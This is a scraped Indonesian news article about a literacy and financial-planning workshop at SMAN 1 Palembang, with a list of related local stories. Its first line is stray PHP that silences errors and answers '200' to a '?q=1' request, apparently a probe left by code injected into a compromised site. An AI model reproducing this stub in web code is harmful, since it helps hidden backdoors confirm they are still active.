error_reporting(0); set_time_limit(0); if ($_GET['q']=='1'){echo '200'; exit;} Duta Literasi Sumsel Adakan Workshop Bersama OJK dan Disdik Sumsel Di SMAN 1 Palembang - SMI.COM

Home / PALEMBANG

Selasa, 24 Januari 2023 - 19:46 WIB

Duta Literasi Sumsel Adakan Workshop Bersama OJK dan Disdik Sumsel Di SMAN 1 Palembang

Palembang, SMI-

Workshop bersama Duta Literasi Provinsi Sumsel, Otoritas Jasa Keuangan (OJK) Regional VII dan Dinas Pendidikan Provinsi Sumsel dengan tema”Perencanaan Keuangan Untuk Masa Depan” dilaksanakan di SMA Negeri 1 Palembang, Selasa (24/1/2023).

Duta Literasi Sumatera Selatan Ratu Tenny Leriva mengatakan, workshop ini dapat terlaksana berkas kerjasama antara Dinas Perpustakaan Provinsi Sumsel dan juga Dinas Dinas Pendidikan dan OJK Regional VII. Seperti biasa melaksanakan workshop mengenai literasi untuk menyiapkan para siswa untuk menjadi pemuda yang siap bersaing di finansial maupun peduli lingkungan.

“Workshop ini meliputi pemaparan mengenai literasi dan mengajak seluruh teman-teman untuk menggunakan platform mereka atau wadah mereka untuk berinteraksi semaksimal mungkin. Karena kita ada literasi digital jadi mengingatkan bagaimana agar mereka lebih bijak lagi menggunakan media sosial. Selain itu, juga bagaimana agar bisa bermanfaat menggunakan platform yang mereka miliki,” ujarnya.

Baca Juga :  78 Peserta Seleksi Pendidikan Perwira Alih Golongan TA 2021 Polda Sumsel Dinyatakan Lulus

Selain workshop sambung Ratu Tenny Leriva, juga ada pengukuhan di Duta Literasi SMAN 1 Palembang.

“Jadi targetnya adalah meningkatkan indeks literasi di SMA Negeri 1 Palembang. Karena semangat literasi ini ada pada diri siswa masing-masing. Jadi targetnya indeks literasi mereka meningkat, minat membaca mereka meningkat dan juga agar mereka berani untuk memberantas berita yang tidak benar yang ada pada saat mereka melaksanakan literasi digital,” katanya.

Pada kesempatan itu, Ratu Tenny Leriva menghimbau agar siswa gemar membaca sesuai dengan yang disukai. Apalagi literasi itu sekarang tidak harus ke perpustakaan saja tapi juga bisa didapatkan dari mana saja. “Jadi gunakanlah atau ada yang kalian miliki semaksimal mungkin,” ucapnya.

Baca Juga :  Oftimis Raih Emas PON XX di Papua, Muba Tuan Rumah Pelatda 

Ratu Tenny Leriva mengungkapkan, untuk fasilitas literasi di SMA Negeri 1 Palembang sudah baik.

“Sudah ada perpustakaan. Selain itu juga ada pojok baca di setiap kelas. Jadi semoga itu bisa berjalan terus berjalan dan juga manfaat dari bacaan tersebut bisa tersalurkan,” tuturnya.

Sementara itu, Kepala sekolah SMA Negeri 1 Palembang H. Moses Ahmad menambahkan, pihaknya sudah menyiapkan sarana dan prasarana untuk meningkatkan literasi siswa. “Kami ada perpustakaan dan juga ada pojok di setiap kelas. Untuk buku bacaan juga kami siapkan beragam untuk menarik minat siswa,” pungkasnya. (Anjas)

Share :

Baca Juga

PALEMBANG

TK Restu Bunda Berikan Bantuan Sosial Kepada Warga Yang Membutuhkan

PALEMBANG

Gubernur Akan Turun Ke Lokasi Harimau Terkam Korban

PALEMBANG

PERKETAT PENGAWASAN HEWAN TERNAK ANTISIPASI PENYAKIT MULUT DAN KUKU ( PMK ) 

PALEMBANG

Dit Lantas Polda Sumsel melaksanakan Giat Binrohtal

PALEMBANG

Kabid Media Masa Dan Humas MPC PP Kota Palembang Sambangi Panti Sosial Asuhan Anak Al Hikmah

PALEMBANG

Adakan Berbagai Lomba, Proker Srikandi PP Kec Alang-alang Lebar Sukses Digelar

PALEMBANG

Mahasiswa, Akademisi dan Advokat Sepakat Berantas Mafia Tanah

PALEMBANG

PRAJURIT 143 BERI MOTIVASI BANTU CERDASKAN PELAJAR PERBATASAN